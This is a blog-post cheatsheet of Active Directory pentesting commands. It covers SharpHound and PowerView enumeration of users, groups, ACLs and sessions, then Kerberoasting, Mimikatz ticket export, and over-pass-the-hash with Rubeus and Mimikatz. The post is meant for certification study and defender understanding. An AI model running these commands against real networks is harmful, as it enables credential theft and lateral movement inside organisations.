noobsec
Table of contents

Active Directory (AD) Cheatsheet

This post assumes that opsec is not required and you can be as noisy as may be required to perform the enumeration and lateral movement. This post is meant for pentesters as well as defenders for the same reason - understand the AD environment better.

This cheatsheet would help some certifications like CRTP, OSCP, PNPT, and such.

Note: Only a subset of flags and switches, which are most commonly used, are shared. Best documentation is the code itself.

This is a living document. Last updated: 19 / June / 2022

Enumeration

Initial and lateral movement enumeration

Get the Dog Out - SharpHound + BloodHound

Let’s have the dog sniff things out because automated enumeration is cool

The tools used are - BloodHound, SharpHound.exe or SharpHound.ps1

Leverage secure LDAP

./SharpHound.exe --SecureLdap

Getting all the data

./SharpHound.exe --CollectionMethod All

It’s best to pull session info separately
Gathering data in a loop (default 2hrs), makes sense for sessions as they change

./SharpHound.exe --CollectionMethod Session [--Loop] [--LoopDuration <HH:MM:SS>] [--LoopInterval <HH:MM:SS>]

Run in a different context

./SharpHound.exe --CollectionMethod All --LdapUsername <user_name> --LdapPassword <pass>

Specify domain

./SharpHound.exe -d this.domain.local --CollectionMethod All

Next step would be to take this data and then feed it to BloodHound GUI to finally have some fun :)

Getting Hands Dirty - PowerView

Let’s have some fun ourselves with manual enumeration.

We will use PowerView and some net commands to perform enumeration manually.

Assuming that latest PowerView script (master and dev are the same) has been loaded in memory.

Domain Enumeration

Get basic information of the domain

Get-Domain

Get domain SID

Get-DomainSID

Get domain policies

Get-DomainPolicy [-Domain <target>]

Get domain Kerberos policy

(Get-DomainPolicy).KerberosPolicy

Get list of DCs

Get-DomainController [-Domain <target>]

Get DC IP

nslookup <target_dc>

Forest Enumeration

Get current forest

Get-Forest

Get a list of domains

Get-ForestDomain [-Forest <target>]

User Enumeration

Get a list of users

Get-NetUser [-Domain <target>] [user_name]

net user /domain

Get a count of users

(Get-NetUser).count

Get a list of users with some specific properties

Get-NetUser [-Properties <>]

Get a list of users with their logon counts, bad password attempts where attempts are greater than 0

Get-NetUser | select cn, logoncounts, badpwdcount | ? {$_.badpwdcount -gt 0}

Finding users with SPN

Get-NetUser -SPN

Finding users who are AllowedToDelegateTo

Get-NetUser -TrustedToAuth

Finding users who can be delegated

Get-NetUser -AllowDelegation

Computer Enumeration

Get a list of computers

Get-NetComputer [-Domain <target>] [-OperatingSystem "*2016*"] [-Properties <>]

Get a list of computers with Unconstrained delegation

Get-NetComputer -Unconstrained

Finding users who are AllowedToDelegateTo

Get-NetComputer -TrustedToAuth

Group Enumeration

Get a list of groups in a domain

net group /domain

Get a list of groups in a domain

Get-NetGroup [-Domain <target>] [-FullData] [-GroupName "*admin*"] [-Username 'user_name']

Get group membership

Get-NetGroupMember [-GroupName 'group_name'] [-Recurse]

Share Enumeration

List shares user have access to

Invoke-ShareFinder -CheckShareAccess -ErrorAction SilentlyContinue [-ComputerDomain <target_domain>]

ACL Enumeration

Get resolved ACEs, optionally for a specific user/group and domain

Get-ObjectAcl [-Identity <user_name>] [-Domain <target_domain>] -ResolveGUIDs

Get interesting resolved ACLs

Invoke-ACLScanner [-Domain <target_domain>] -ResolveGUIDS

Get interesting resolved ACLs owned by specific object (ex. noobsec)

Invoke-ACLScanner -ResolveGUIDS \| ?{$_.IdentityReference -match 'noobsec'}

Session Enumeration

Finding sessions on a computer

Get-NetSession [-Computer <comp_name>]

Get who is logged on locally where

Get-LoggedOnLocal [-ComputerName <comp_name>]

User Hunting

Get list of machines where current user has local admin access

Find-LocalAdminAccess [-Domain <target_domain>]

Find machines where members of specific groups have sessions. Default: Domain Admins

Invoke-UserHunter [-GroupName <group_name>]

Find machines where current user has local admin access AND specific group sessions are present

Invoke-UserHunter -CheckAccess

Lateral Movement

Kerberoasting

To see existing tickets

klist

Remove all tickets

klist purge

PowerView

Request a kerberos service ticket for specified SPN.
By default output in Hashcat format

Request-SPNTicket -SPN "CIFS/target.domain.local" [-OutputFormat JTR]

Manually

By doing it manually, ticket is generated, it requires to be extracted to crack the hash

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "CIFS/target.domain.local"

Dump the tickets out

Invoke-Mimikatz -Command '"kerberos::list /export"'

Now, crack ’em

Over-Pass the Hash

Rubeus

Rubeus.exe asktgt /user:USER < /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/opsec] /ptt

Mimikatz

sekurlsa::pth /user:Administrator /domain:target.domain.local < /ntlm:hash | /aes256:hash> /run:powershell.exe
comments powered by Disqus